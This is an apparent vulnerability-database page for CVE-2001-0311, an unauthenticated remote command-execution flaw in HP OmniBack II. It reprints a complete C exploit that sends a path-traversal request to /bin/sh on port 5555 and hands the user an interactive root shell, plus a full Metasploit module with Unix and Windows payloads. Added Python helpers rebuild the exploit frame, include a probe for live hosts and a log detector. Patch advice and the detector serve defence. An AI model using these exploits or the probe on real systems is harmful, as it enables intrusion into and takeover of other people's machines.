CVE-2001-0311
CVSS 4.6
Published: 2001-06-02 00:00:00
Revised: 2008-09-05 16:23:48

[Original] Vulnerability in OmniBackII A.03.50 in HP 11.x and earlier allows attackers to gain unauthorized access to an OmniBack client.


[CNNVD] HP OmniBackII unauthorized access vulnerability (CNNVD-200106-051)

        OmniBackII A.03.50 on HP-UX 11.x and earlier contains a vulnerability. An attacker can gain unauthorized access to the OmniBack client.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely information disclosure]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

The LOCAL access vector in this score does not match the public exploits listed further down, which reach the OmniBack client over the network on TCP port 5555 with no credentials (Exploit-DB lists both entries as "remote", and OSVDB classifies the issue as "Remote / Network Access"). When assessing exposure, treat the inet service as remotely exploitable.

- CPE (affected platforms and products)

cpe:/a:hp:omniback_ii:a.03.50    HP OmniBackII A.03.50
cpe:/o:hp:hp-ux:11    HP-UX 11 family

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0311
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0311
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-051
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/6434
(UNKNOWN)  XF  omniback-unauthorized-access(6434)
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0102-142
(UNKNOWN)  HP  HPSBUX0102-142
http://archives.neohapsis.com/archives/hp/2001-q1/0023.html
(UNKNOWN)  HPBUG  PHSS_22915
http://archives.neohapsis.com/archives/hp/2001-q1/0022.html
(UNKNOWN)  HPBUG  PHSS_22914

- Vulnerability information

HP OmniBackII unauthorized access vulnerability
Severity: Medium    Type: Unknown
Published: 2001-06-02 00:00:00    Updated: 2006-11-14 00:00:00
Access: Local
        OmniBackII A.03.50 on HP-UX 11.x and earlier contains a vulnerability. An attacker can gain unauthorized access to the OmniBack client.

- Advisories and patches


- Vulnerability information (1114)

HP OpenView OmniBack II Generic Remote Exploit (EDBID:1114)
Platform: multiple    Type: remote
2000-12-21 Verified
Port: 5555    Author: DiGiT
N/A
/*
 * HP OpenView OmniBack II generic remote Exploit by DiGiT - teddi@linux.is
 *
 * Omniback is a network backup system by HP, widely used.
 * took me some time to figure out how omniback communicated then it was just
 * a matter of finding a bug.
 *
 * This lovely little exploit will give you a remote "shell" of sorts, you
 * can execute any command on the system.
 *
 * As far as I can tell this thing is vuln on every Omniback I have seen.
 * I've tried HP-UX, Linux so far, with diff versions etc. It needs some change
 * to work on windows, but should be extremely easy, be creative.
 *
 * Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;>
 *
 * - DiGiT [digit@security.is]
 *
 * I'm releasing this because it leaked and kids got their hands on it ;<
 * sorry.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/stat.h>

/* Connected socket to the OmniBack inet service (TCP 5555) and the resolved target. */
int sockfd;
struct hostent *host;

void
usage (char *progname)
{
  printf ("\nOmniback II *: remote exploit by DiGiT - teddi@linux.is\n");
  printf ("Gives possibility to execute any command on a remote system as root!\n\n");
  printf ("Usage: %s hostname \n\n", progname);
  exit (1);
}

/* Relay stdin to the remote /bin/sh and print whatever comes back. */
int
shell (void)
{
  fd_set fd_stat;
  char buf[1024];
  int n, i;
  static char testcmd[256] = "/bin/uname -a ; id ;\r\n";

  fprintf (stdout, "We have remote shell&%%#$&%%!\n");
  fprintf (stdout, "\nType in any command and it will get executed.\nHave fun... DiGiT - teddi@linux.is\n\n\n");
  write (sockfd, testcmd, strlen (testcmd));

  while (1)
    {
      FD_ZERO (&fd_stat);
      FD_SET (sockfd, &fd_stat);
      FD_SET (0, &fd_stat);
      select (sockfd + 1, &fd_stat, NULL, NULL, NULL);
      if (FD_ISSET (sockfd, &fd_stat))
        {
          /* Keep one byte free for the terminator; 0 means the peer closed. */
          if ((n = read (sockfd, buf, sizeof (buf) - 1)) <= 0)
            {
              printf ("Connection has been closed\n");
              exit (0);
            }
          /* Replies contain NUL bytes; blank them so the whole buffer prints. */
          for (i = 0; i < n; i++)
            if (buf[i] == '\0')
              buf[i] = ' ';
          buf[n] = '\0';
          buf[n - 1] = '\n';
          fprintf (stdout, "%s\n", buf);
        }
      if (FD_ISSET (0, &fd_stat))
        {
          if ((n = read (0, buf, sizeof (buf))) > 0)
            {
              if (write (sockfd, buf, n) == -1)
                {
                  perror ("write");
                  exit (0);
                }
            }
        }
    }
}

/*
 * Send the OmniBack inet request.  Fields are NUL separated; the "28" field
 * is the request number and the field after it is the path the client is
 * asked to execute (compare the "A request 28 (<parameter>)" log lines quoted
 * in the Metasploit module below).  A ../ traversal turns that into /bin/sh.
 */
void
send_code (void)
{
  char path[32];

  /* I dont care I just made test code and it worked, so #$%$# off */
  write (sockfd, "\000\000\000.", 4);
  write (sockfd, "2", 1);
  write (sockfd, "\000", 1);
  write (sockfd, " a", 2);
  write (sockfd, "\000", 1);
  write (sockfd, " 0", 2);
  write (sockfd, "\000", 1);
  write (sockfd, " 0", 2);
  write (sockfd, "\000", 1);
  write (sockfd, " 0", 2);
  write (sockfd, "\000", 1);
  write (sockfd, " A", 2);
  write (sockfd, "\000", 1);
  write (sockfd, " 28", 3);
  write (sockfd, "\000", 1);
  snprintf (path, sizeof (path), "/../../../bin/sh");
  write (sockfd, path, strlen (path));
  write (sockfd, "\000", 1);
  write (sockfd, "\000", 1);
  write (sockfd, "digit ", 6);
  write (sockfd, "AAAA\n", 6); /* 6 bytes on purpose: the trailing NUL is part of the request */

  shell (); /* and the lord said, let there be shell. */
  exit (0);
}

/* Resolve HOSTNAME and connect to the inet service on TCP 5555. */
void
create_socket (char *hostname)
{
  struct sockaddr_in s;
  int ipaddr;

  if ((host = gethostbyname (hostname)) == NULL)
    {
      herror ("gethostbyname");
      exit (1);
    }

  memcpy (&ipaddr, host->h_addr, host->h_length);

  memset (&s, 0, sizeof (struct sockaddr_in));
  s.sin_family = AF_INET;
  s.sin_port = htons (5555);
  s.sin_addr.s_addr = ipaddr;

  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("socket");
      exit (1);
    }

  if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
    {
      perror ("connect");
      exit (1);
    }
}

int
main (int argc, char *argv[])
{
  char hostname[256];

  if (argc < 2)
    {
      usage (argv[0]);
      return 0;
    }

  strncpy (hostname, argv[1], sizeof (hostname) - 1);
  hostname[sizeof (hostname) - 1] = '\0';
  create_socket (hostname);
  send_code ();

  return 0;
}

// milw0rm.com [2000-12-21]
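The request the exploit above writes byte by byte is easier to reason about as a framed message. The following is an added example in Python, not part of the original exploit, the Metasploit module or HP's own code: it builds the same frame, parses it back into the fields a detector would look at, and runs the same "echo /etc/*" liveness check the Metasploit module uses. The field meanings are inferred only from the exploits and from the "A request 28 (<parameter>)" log lines quoted in the module (field 7 is the request number, the next field the path to run); the remaining fields are copied as opaque constants. The network check runs against a constructed in-process mock that answers the way an unpatched client would, so it works offline; point `probe()` at a real host only with authorisation.

```python
"""Build, parse and probe the OmniBack II inet request used by the public exploits."""
import socket
import threading

PREFIX = b"\x00\x00\x00."                      # 4-byte prefix copied verbatim from the exploits
HEADER_FIELDS = [b"2", b" a", b" 0", b" 0", b" 0", b" A", b" 28"]  # last one is the request number
TRAILER_FIELDS = [b"", b"digit AAAA\n", b""]   # constant tail appended by both exploits
REQ_EXEC = "28"                                # request whose parameter is a path to execute

# Exact bytes the Metasploit module sends (Unix check / Windows check), for comparison.
MSF_UNIX_PROBE = (b"\x00\x00\x00.2" b"\x00 a" b"\x00 0" b"\x00 0" b"\x00 0" b"\x00 A"
                  b"\x00 28" b"\x00/../../../bin/sh" b"\x00\x00" b"digit " b"AAAA\n\x00")
MSF_WIN_PROBE = (b"\x00\x00\x00.2" b"\x00 a" b"\x00 0" b"\x00 0" b"\x00 0" b"\x00 A"
                 b"\x00 28" b"\x00\\perl.exe" b"\x00\x20-e\x20system(dir)\x00\x00" b"digit " b"AAAA\n\x00")


def build_request(path: bytes, args: bytes = b"") -> bytes:
    """Serialise a request-28 frame: the prefix, then NUL-separated fields."""
    fields = HEADER_FIELDS + [path] + ([args] if args else []) + TRAILER_FIELDS
    return PREFIX + b"\x00".join(fields)


def parse_request(frame: bytes) -> dict:
    """Split a frame into request number, path parameter and optional arguments."""
    if not frame.startswith(PREFIX):
        raise ValueError("missing frame prefix")
    fields = frame[len(PREFIX):].split(b"\x00")
    if len(fields) < 8:
        raise ValueError("frame too short")
    return {
        "request": fields[6].strip().decode(),
        "path": fields[7].decode(errors="replace"),
        "args": fields[8].decode(errors="replace") if len(fields) > 8 else "",
    }


INTERPRETERS = {"sh", "bash", "ksh", "csh", "perl", "perl.exe", "cmd.exe"}


def is_suspicious(req: dict) -> bool:
    """A request 28 naming a traversal path or a shell/interpreter is an attack probe."""
    if req["request"] != REQ_EXEC:
        return False
    base = req["path"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    return ".." in req["path"] or base in INTERPRETERS


def probe(host: str, port: int, timeout: float = 5.0) -> bool:
    """Same check as the Metasploit module: have /bin/sh echo /etc/* and look for known names."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(b"/../../../bin/sh"))
        s.sendall(b"echo /etc/*;\n")
        try:
            reply = s.recv(4096)
        except socket.timeout:
            return False
    return any(name in reply for name in (b"passwd", b"group", b"resolv"))


def start_mock(vulnerable: bool) -> int:
    """Constructed stand-in for the inet service on 127.0.0.1; returns the bound port.
    vulnerable=True answers like an unpatched client (the echo runs); False behaves like a
    client that refuses the parameter and just closes the connection."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.settimeout(2)
        data = b""
        try:
            while b";\n" not in data:          # frame is followed by the shell command line
                chunk = conn.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass
        frame, sep, cmd = data.partition(b"digit AAAA\n\x00")
        req = parse_request(frame + sep) if sep else {}
        if vulnerable and req.get("request") == REQ_EXEC and b"echo /etc/*" in cmd:
            conn.sendall(b"/etc/group /etc/hosts /etc/passwd /etc/resolv.conf\n")  # constructed reply
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    print("mock vulnerable:", probe("127.0.0.1", start_mock(True)))
    print("mock patched:   ", probe("127.0.0.1", start_mock(False)))
```

`build_request` reproduces the Metasploit probes byte for byte, which is the property worth checking before trusting a parser written from an exploit: if the builder and the module disagree on a single NUL, a detector keyed on field positions will miss real traffic.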
		

- Vulnerability information (16291)

HP OpenView OmniBack II Command Execution (EDBID:16291)
Platform: multiple    Type: remote
2010-09-20 Verified
Port: 0    Author: metasploit
N/A
##
# $Id: openview_omniback_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView OmniBack II Command Execution',
			'Description'    => %q{
					This module uses a vulnerability in the OpenView Omniback II
				service to execute arbitrary commands. This vulnerability was
				discovered by DiGiT and his code was used as the basis for this
				module.

				For Microsoft Windows targets, due to module limitations, use the
				"unix/cmd/generic" payload and set CMD to your command. You can only
				pass a small amount of characters (4) to the command line on Windows.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2001-0311'],
					['OSVDB', '6018'],
					['BID', '11032'],
					['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
				],
			'Platform'       => ['unix'], # win
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Unix', { }],
					[ 'Windows', { }],
				],
			'DisclosureDate' => 'Feb 28 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5555)
			], self.class)
	end

	def check

		if (target.name =~ /Unix/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00/../../../bin/sh"+
				"\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			sock.put("echo /etc/*;\n")
			res = sock.get_once(-1, 5)
			disconnect

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /passwd|group|resolv/)
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end

		if (target.name =~ /Windows/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00\\perl.exe"+
				"\x00\x20-e\x20system(dir)\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			res = sock.get_once(-1, 5)
			disconnect

			print_status(res.to_s)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /V.o.l.u.m.e/) #Unicode
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		if (target.name =~ /Unix/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00/../../../bin/sh"+
				"\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			sock.put(payload.encoded + ";\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end

		if (target.name =~ /Windows/)

			# patrickw
			#
			# Tested during pen test against Windows 2003 server.
			# Windows Service details:
			# - Data Protector Inet
			# -> [HP OpenView Storage Data Protector] - Backup client service
			# -> "C:\Program Files\OmniBack\bin\omniinet.exe"
			# -> OmniInet service for Windows NT
			# -> File version: 6.0.0.0
			#
			# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
			#
			# Notes:
			# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
			# Perhaps a difference in Windows/Unix code? Logs:
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: ..\foo.exe
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00\\perl.exe"+
				"\x00\x20-esystem(#{payload.encoded})\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			#sock.put(payload.encoded + "\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end
	end
end
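The comments in the Windows branch of the module quote Data Protector inet log records showing a newer client (A.06.00) refusing request 28 because the sender is not its cell manager. Those records are exactly what a defender wants to alert on, because they mean someone is sending the exploit frame. The following is an added example, not part of the page, the Metasploit module or HP's software: it parses those quoted records and pairs each "not a cell manager" request with the "parameter refused" record that follows it. The two-line record layout and the field names are inferred from the quoted excerpts alone; the sample log is those same excerpts, with "[attacker]" being the module author's redaction.

```python
"""Alert on OmniBack/Data Protector inet log records that show a refused request 28."""
import re

# The six records quoted in the Metasploit module's comments (constructed sample input).
SAMPLE_LOG = """\
11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
A request 28 (..\\foo.exe) came from host [attacker] which is not a cell manager of this client

11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
[RxNtIntegUtil] parameter refused: ..\\foo.exe

11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client

11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:

11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client

11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >
"""

# Header line: timestamp, INET.<pid>.<tid>, ["<source file>":<line>], version, build.
HEADER_RE = re.compile(
    r'^(?P<time>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M)\s+'
    r'INET\.(?P<pid>\d+)\.(?P<tid>\d+)\s+\["(?P<src>[^"]+)":(?P<line>\d+)\]\s+'
    r'(?P<version>\S+)\s+(?P<build>\S+)\s*$')
REQUEST_RE = re.compile(
    r'^A request (?P<req>\d+) \((?P<param>.*)\) came from (?:host )?\[(?P<host>[^\]]+)\]'
    r' which is not a cell manager of this client$')
REFUSED_RE = re.compile(r'^\[RxNtIntegUtil\] parameter refused: (?P<param>.*)$')

# Traversal and shell operators seen in the quoted parameters.
SHELL_META = ("..", "&&", "||", "|", ";", ">", "<")


def parse_inet_log(text: str) -> list:
    """Turn header/message line pairs into dict records; stray lines without a header are dropped."""
    records, header = [], None
    for line in text.splitlines():
        line = line.rstrip()
        if not line:
            continue
        m = HEADER_RE.match(line)
        if m:
            header = m.groupdict()
            continue
        if header is not None:
            records.append({**header, "message": line})
            header = None
    return records


def detect(records: list) -> list:
    """One alert per rejected request, marked refused when the matching refusal follows it."""
    alerts = []
    for i, rec in enumerate(records):
        m = REQUEST_RE.match(rec["message"])
        if not m:
            continue
        refused = False
        for follow in records[i + 1:i + 3]:        # the refusal is logged right after, same process
            r = REFUSED_RE.match(follow["message"])
            if r and follow["pid"] == rec["pid"] and r["param"] == m["param"]:
                refused = True
                break
        dangerous = m["req"] == "28" and any(t in m["param"] for t in SHELL_META)
        alerts.append({
            "time": rec["time"],
            "source": m["host"],
            "request": m["req"],
            "param": m["param"],
            "refused": refused,
            "severity": "high" if dangerous else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in detect(parse_inet_log(SAMPLE_LOG)):
        print(a)
```

A request 28 that the client did not refuse (no paired "parameter refused" record) is the case to escalate: on the A.03.50 client this CVE covers there is no cell-manager check at all, so absence of these log lines on an old client is not evidence of absence.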
		

- Vulnerability information (F82266)

HP OpenView OmniBack II Command Execution (PacketStormID:F82266)
2009-10-27 00:00:00
H D Moore, patrick  metasploit.com
exploit, arbitrary
CVE-2001-0311

This Metasploit module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module.

The module source carried by this Packet Storm entry is the same Metasploit module as the EDBID:16291 listing above.

- Vulnerability information

OSVDB ID: 6018
Title: HP OpenView OmniBack Unauthorized OmniBack Client Access
Location / Attack type: Remote / Network Access, Input Manipulation
Impact / Solution: Loss of Integrity, Patch / RCS
Exploit: Public, Commercial; Vendor Verified

- Vulnerability description

HP OpenView OmniBack contains a flaw that may allow a remote attacker to gain unauthorized access. The issue is triggered due to an unspecified flaw in the OmniBack client, which may allow a remote attacker to gain administrative access to the system and execute arbitrary commands resulting in a loss of confidentiality and/or integrity.

- Timeline

2001-02-28 Unknown
2000-12-21 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Hewlett-Packard has released a patch to address this vulnerability. The HP bulletin HPSBUX0102-142 and the HP-UX patches PHSS_22914 and PHSS_22915 are listed under "Other links and resources" above. Until the patch is applied, limit which hosts can reach the inet service on TCP port 5555, since the exploits above need nothing more than a connection to it; later Data Protector clients reject request 28 from any host that is not their cell manager, as the log lines quoted in the Metasploit module show.

- Related references

- Vulnerability author

